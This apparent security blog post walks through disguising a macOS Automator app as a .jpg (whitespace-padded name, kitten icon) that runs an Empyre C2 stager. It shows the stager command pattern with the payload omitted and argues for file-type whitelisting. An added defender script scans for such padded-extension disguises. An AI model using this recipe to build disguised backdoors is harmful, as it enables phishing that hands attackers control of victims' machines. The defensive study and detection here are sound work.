Computers are easy

Computers have been made easy, easy to use so more can be sold and so more can be achieved, and like everything lately that means success and exploitation.

When was the last time you checked the permissions of a file? Right? Me too, I'm busy also. The inherent trust we give the files on our computer exists because ... it doesn't usually lead to a compromise if I don't scrutinise every file that has come from an untrusted network or external volume. We all have an acceptable risk policy that's pretty much finger in the air + how paranoid I am on that day. Some friends of mine (non-security friends) simply don't care: they know they have viruses/infections but have no time to fix it or don't want to pay just yet, and are happy sharing their systems with bad guys/botnets/whatever.

I've been playing around trying to create a misleading file. This one is for the Mac. I'm going to walk through how it was made, what it does and what the considerations are (and caveats) in a bid to show readers that essentially, if you aren't whitelisting file types at your mail server, ingress and volume access, you will always have trouble ... and that's fine if that's the acceptable risk.
Creating a .JPG (cough) that will backdoor OS X
- Virtual Private Server (for C2, I will use Digital Ocean)
- Empyre (Python version of Empire, more info here)
- A Mac (to prepare the '.jpg')
- Thumbnail creation software (you can do this without commercial software I believe, but it's changed and, as I said, I'm busy)
- Automator to wrap it up

There are SO many ways to create nasty files and we will get to that, but this is just one of them, so keep that in mind.

We need to create a listener for the payload to connect back to:
Although it says Peggy, I later renamed it to Kittyjpg
Next we need Empyre to generate its stager code to call back to its C2 (the VPS). We will use a bash script invoking Python via Automator's Library > Utilities > Run Shell Script.
It looks like this:
echo "import sys,base64;exec(base64.b64decode('[base64-encoded stager omitted]'));" | python &
rm -f "$0"
If we base64-decode it, it tells us what it's doing:

Next we need to test that it's working:

As we can see, the agent has connected and is active. We have a backdoor from the code; next we need to bake it into something convincing, or click worthy...

We will create an .app using Utilities and Run Shell Script.

Save it with a ton of whitespace in the name, so it looks like this: bg.jpg .app. From the terminal it might look like this, depending on how much space you give it:
And from View 1 of the 4 available views on the Mac it looks like this ...

We need to give it an icon.

Oh yeah, I went there, cute kitten, suckers!

Now the payload looks like this in the 4 available OS X views:

There are some tells here that a sharp eye will spot in views 2, 3 and 4, but generally it looks pretty good.

Let's give it a spin:
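The whole trick is that the name "bg.jpg" plus a run of spaces plus ".app" displays as an image while the OS treats it as an application bundle. As an added example (my code, not from the original post), here is a small defender-side scan that flags that padded-extension pattern on a folder of files; the Automator check assumes Automator-built apps carry Contents/document.wflow, and the sample folder is constructed, not real data.

```python
import os
import tempfile

# Disguise pattern from the walkthrough: a harmless-looking display extension,
# a run of padding whitespace, then the real extension macOS actually honours.
DISPLAY_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".pdf", ".txt"}
EXEC_EXTS = {".app", ".command", ".sh", ".tool", ".workflow", ".pkg"}

def inspect_name(name):
    """Return the reasons a bare file name looks like a padded-extension disguise."""
    reasons = []
    real_ext = os.path.splitext(name)[1].lower()
    parts = name.split()                      # "bg.jpg      .app" -> ["bg.jpg", ".app"]
    if len(parts) > 1 and real_ext in EXEC_EXTS:
        shown_ext = os.path.splitext(parts[0])[1].lower()
        if shown_ext in DISPLAY_EXTS:
            reasons.append(f"shows as {shown_ext} but is really {real_ext}")
    if "   " in name:                         # three or more spaces is never an accident
        reasons.append("name padded with whitespace")
    return reasons

def inspect_path(path):
    """Name checks plus a look inside .app bundles (which are directories on disk)."""
    reasons = inspect_name(os.path.basename(path))
    if os.path.isdir(path) and path.lower().endswith(".app"):
        # Assumption: Automator-built apps keep their workflow in Contents/document.wflow
        if os.path.isfile(os.path.join(path, "Contents", "document.wflow")):
            reasons.append("Automator-built application bundle")
    return reasons

def scan(directory):
    """Map each suspicious entry in a directory to its list of reasons."""
    findings = {}
    for name in sorted(os.listdir(directory)):
        reasons = inspect_path(os.path.join(directory, name))
        if reasons:
            findings[name] = reasons
    return findings

def demo():
    """Build a constructed sample folder (not real data) and scan it."""
    root = tempfile.mkdtemp()
    fake = "bg.jpg" + " " * 40 + ".app"       # the disguised bundle from the post
    os.makedirs(os.path.join(root, fake, "Contents", "MacOS"))
    open(os.path.join(root, fake, "Contents", "document.wflow"), "w").close()
    os.makedirs(os.path.join(root, "Notes.app", "Contents", "MacOS"))  # honest app
    open(os.path.join(root, "holiday.jpg"), "w").close()               # honest image
    return scan(root)

if __name__ == "__main__":
    for name, reasons in demo().items():
        print(repr(name), "->", "; ".join(reasons))
```

Only the disguised bundle is reported; the honest image and the honest .app pass clean, which is the behaviour you want from a gateway or volume-access check.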
Click for demo
Obviously not the finest work, I wouldn't expect this from state sponsored attacks haha, but it's just a demonstration reinforcing the message about gateway file type whitelists (by extension), USB lockdown and endpoint protection. It's genuinely not fair to blame users; best leave it up to computers to decide what is and isn't what it appears to be. They have more time to do it and it's what they are for.

I chose OS X because people often think of OS X as less of a victim. Attackers have something for every attack surface nowadays, but the majority of their success comes from phishing and getting files executed on behalf of the bad guy/girl.

There are SO many file types we need to be careful of, or rather, that we need to protect end users from. Best not to afford them the chance to fail.